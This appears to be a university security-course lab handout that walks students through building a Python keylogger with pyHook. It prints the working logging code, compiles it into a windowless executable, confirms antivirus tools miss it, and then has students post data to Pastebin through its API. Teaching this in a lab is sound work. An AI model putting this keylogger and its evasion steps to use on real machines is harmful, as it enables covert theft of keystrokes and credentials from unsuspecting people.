ONLY RUN THIS ON YOUR OWN TEST SYSTEMS
It's OK to run it in SCIE 214, of course, but NOT on other machines on campus.
I don't know what's wrong with the antivirus companies. It should NOT be this easy to defeat them.
If not, install Python, PyWin32, and pip as explained in Project 8.
http://go.microsoft.com/?linkid=7729279
Download and run the vcsetup.exe file.
Click Next.
Accept the license terms and click Next.
Uncheck "Silverlight" and "Microsoft SQL Server".
Click Next, Install.
Wait while software downloads and installs, as shown below:
Restart your computer if you are prompted to.
Troubleshooting
If you see a message saying 'You must use "Turn Windows features on or off" in the Control Panel to install or configure Microsoft .NET Framework 3.5 SP1.', click OK. Continue and exit the Visual Studio C++ Express installer. It will say it failed. Click Start, "Control Panel".
Click Programs.
Click "Turn Windows features on or off".
Click the check box next to "Microsoft .NET Framework 3.5.1". Click OK.
Double-click the vcsetup.exe file and run the installation again.
http://www.swig.org/download.html
In the sentence starting with "Windows users should download...", click the swigwin-3.0.0 link.
Save the swigwin-3.0.0.zip file on your desktop.
Right-click it, and click "Extract All...", Extract.
On your desktop, double-click the swigwin-3.0.0 folder.
Double-click the swigwin-3.0.0 subfolder.
Right-click the swig.exe file and click Copy.
Navigate to the C:\Windows\System32 folder, right-click an empty portion of the window, and click Paste.
If a box pops up saying "You'll need to provide Administrator permission...", click Continue.
In the Search box, type pip-win.
It may take several seconds to find it, but when it does, pip-Win_1.6.exe should appear. Click it.
In the Command field, enter:
venv pyi-env-name
Click Run.
A Command Prompt opens with a prompt beginning with
<pyi-env-name>
http://sourceforge.net/projects/pyhook/files/
Click the "Download pyHook-1.5.1.zip (13.9 kB)" link.
Save the file on your desktop.
Right-click it, and click "Extract All...", Extract.
In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands (you may need to change the path to get to the desktop on your system):
set SWIG_LIB=C:\Users\Administrator\Desktop\swigwin-3.0.0\swigwin-3.0.0\Lib
cd C:\Users\Administrator\Desktop
cd pyHook-1.5.1\pyHook-1.5.1
setup.py install
A successful install looks like this:
import pythoncom, pyHook, sys, logging
LOG_FILENAME = 'YOURNAME-keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    print "Key: ", chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
Replace "YOURNAME" with your own name.
Save it as YOURNAME-keylog.py on your Desktop. When saving, use "Save as type" of "All Files" to prevent Notepad from adding a ".txt" file extension.
In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands:
cd C:\Users\Administrator\Desktop
YOURNAME-keylog.py
Open Notepad and type in your name.
You should see the keypresses being captured, as shown below:
Click on the host system's taskbar, at the bottom of the screen.
Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.
Save the image as "Proj 9a from YOUR NAME".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Close the Command Prompt.
In the "Pip-Win_1.6" box, click Run.
cd C:\Users\Administrator\Desktop
pyinstaller --onefile --noconsole YOURNAME-keylog.py
A folder named "Dist" should now be present on your desktop. Double-click the Dist folder.
You should see your executable keylogger, named "YOURNAME-keylog.exe".
No window opens.
Right-click the taskbar and click "Task Manager". On the Processes tab, you can see the keylogger running, as shown below.
Open Notepad and type in your name again.
A file named "YOURNAME-keylog.txt" appears in the Dist folder, as shown below.
Double-click the YOURNAME-keylog.txt file. Your name should be visible, as shown below.
Click on the host system's taskbar, at the bottom of the screen.
Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.
Save the image as "Proj 9b from YOUR NAME".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
Click the "Choose File" button.
Browse to your "YOURNAME-keylog.exe" file and double-click it.
Click the "Scan It!" button.
Your file should be essentially undetectable now, as shown below.
Click on the host system's taskbar, at the bottom of the screen.
Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.
Save the image as "Proj 9c from YOUR NAME".
YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT
At the upper right, click the "sign up" link. Create an account. For an email account, I recommend using this service:
Open the email from pastebin and click the link in it to activate your account.
In the Pastebin window, logged in to your account, at the top right, click the api link. Read the "Your Unique Developer API Key" and "Creating a New Paste" sections.
Write a Python script that will post your initials on Pastebin. I recommend using your initials rather than your whole name because I don't know any way to delete the text once it gets posted this way.
I recommend reviewing "Proj 5: HTTP Scanning with Python".
When you get it working, capture these two images:
A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:
An image of the Web page showing your initials pasted to Pastebin:
You don't need to compile this into an EXE or test it at VirusTotal, but I did, and it is completely undetectable:
http://www.daniweb.com/software-development/python/threads/229564/python-keylogger